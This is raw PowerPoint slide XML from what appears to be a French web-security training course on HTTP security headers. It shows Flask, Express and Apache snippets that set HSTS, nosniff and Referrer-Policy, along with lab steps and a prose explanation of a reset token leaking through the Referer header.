            <a:off x="1325880" y="4462272"/>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Caméra, micro, géoloc : non, sauf si vous le dites. Une iframe pub n’ouvre pas la cam.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="5010912"/>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Aucun de ces headers n’empêche un innerHTML. Ils réduisent le rayon. Un exemple par header suit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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03 · headers snippets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Une fois, toutes les réponses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10058400" cy="1874519"/>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874519"/>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Flask  ·  after_request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1426464"/>
            <a:ext cx="9729216" cy="1490471"/>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@app.after_request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def sec_headers(r):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    r.headers["Strict-Transport-Security"] = "max-age=63072000; includeSubDomains"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    r.headers["X-Content-Type-Options"] = "nosniff"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    r.headers["Referrer-Policy"] = "no-referrer"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    return r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3081527"/>
            <a:ext cx="10058400" cy="249631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3081527"/>
            <a:ext cx="64008" cy="249631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3154679"/>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Express</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="3392423"/>
            <a:ext cx="9729216" cy="211226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app.use((req, res, next) =&gt; {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  res.setHeader("Strict-Transport-Security", "max-age=63072000; includeSubDomains");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  res.setHeader("X-Content-Type-Options", "nosniff");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  res.setHeader("Referrer-Policy", "no-referrer");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  next();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// ou helmet()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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6"/>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7"/>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8"/>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8"/>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s3_04</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Choisir un cas. Cinq headers.</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Dans l’ordre du cours. 01 HSTS est distant. 02–05 tournent en local sur :8037.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hub : http://127.0.0.1:8037/  ·  HSTS : training.dercetech.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1536192"/>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3"/>
              </a:rPr>
              <a:t>Hub local  ·  http://127.0.0.1:8037/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1773936"/>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4"/>
              </a:rPr>
              <a:t>Hub hébergé  ·  s3_04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="d3s4-headers-menu.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4168790" y="2066544"/>
            <a:ext cx="3823938" cy="3310127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>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01 distant  ·  02 nosniff  ·  03 Referrer  ·  04 CSP  ·  05 Permissions (iframe pub).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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s3_04  ·  HSTS</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HSTS, cinq minutes. Pas deux ans.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="11155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s3_04 / strict-transport-security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1389888"/>
            <a:ext cx="10058400" cy="3685031"/>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05840" y="1389888"/>
            <a:ext cx="64008" cy="3685031"/>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207008" y="1463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_servers/…/day-3/s3_04/strict-transport-security/.htaccess</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1700784"/>
            <a:ext cx="9729216" cy="3300983"/>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&lt;IfModule mod_headers.c&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  # Cinq minutes : assez pour observer. Pas une politique collée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  # deux ans sur le navigateur des stagiaires.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  Header always set Strict-Transport-Security "max-age=300"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/IfModule&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>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Le header s’applique à tout le host, même posé depuis ce dossier. Tapez http:// — page suivante.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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5"/>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6"/>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7"/>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7"/>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s3_04  ·  HSTS</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307 Internal Redirect. Reason : HSTS.</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Vous avez demandé http://. Le navigateur n’est pas allé sur le fil en clair. Il a forcé https.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Non-Authoritative-Reason: HSTS. Ce n’est pas Apache. C’est Chrome qui se souvient.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1536192"/>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3"/>
              </a:rPr>
              <a:t>Ouvrir le lab HSTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="d3s4-hsts-devtools.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1828800"/>
            <a:ext cx="10149840" cy="2603526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4487190"/>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Network  ·  307  ·  Location https://…  ·  max-age=300, vous n’êtes pas coincé jusqu’en 2028.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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6"/>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7"/>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8"/>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8"/>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s3_04  ·  nosniff</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Annoncez le type. Ne laissez pas le navigateur deviner.</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day-3/s3_04_headers. nosniff est déjà posé. Le Content-Type, non. TODO dans le fichier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cherchez comment fixer le type exact : application/javascript, text/css. Sans ça, le navigateur sniffe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1536192"/>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day-3/s3_04_headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="d3s4-nosniff-server.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1828800"/>
            <a:ext cx="4992624" cy="1439353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="d3s4-nosniff-ui.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6163056" y="1828800"/>
            <a:ext cx="4992624" cy="1752965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3636629"/>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À gauche : le TODO. À droite : JS non exécuté, CSS non lu. Posez le Content-Type. Ça doit tourner.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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6"/>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6"/>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169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LAB  ·  s3_04_headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="786384"/>
            <a:ext cx="10058400" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le navigateur ne doit plus deviner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1225296"/>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335024"/>
            <a:ext cx="10058400" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>github.com/Dercetech/training-secu-5d    ·    day-3/s3_04_headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1572768"/>
            <a:ext cx="10058400" cy="237744"/>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  day-3/s3_04_headers  ·  node-express et python-flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1847088"/>
            <a:ext cx="10058400" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Contexte</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2066543"/>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nosniff sans Content-Type : le navigateur a encore une raison de sniffer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2322576"/>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Deux routes : un .js, un .css. Le TODO est dans server.js.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="2578608"/>
            <a:ext cx="9875520" cy="256032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>·  Flask : même contrat, autre dossier.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2889504"/>
            <a:ext cx="10058400" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Servir le JS et le CSS avec le bon Content-Type. Plus de guess.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3666744"/>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3666744"/>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3739896"/>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1.  Ouvrir day-3/s3_04_headers. Lire le README. Lancer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rounded Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4160520"/>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 y="4160520"/>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325880" y="4233672"/>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2.  Chercher comment poser Content-Type : application/javascript, text/css.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rounded Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4654296"/>
            <a:ext cx="10058400" cy="43891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840" y="4654296"/>
            <a:ext cx="64008" cy="43891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325880" y="4727448"/>
            <a:ext cx="9509760" cy="310896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3.  Network : le type est annoncé. Plus de MIME sniffing.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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6"/>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7"/>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8"/>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8"/>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s3_04  ·  Referrer-Policy</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Le reset_token a traversé. Dans Referer.</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Vous cliquez un lien. Le site suivant reçoit l’URL complète, jeton compris.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Referer (un r, une faute historique). Referrer-Policy (deux r) : vous décidez ce qui part.</a:t>
            </a:r>
          </a:p>
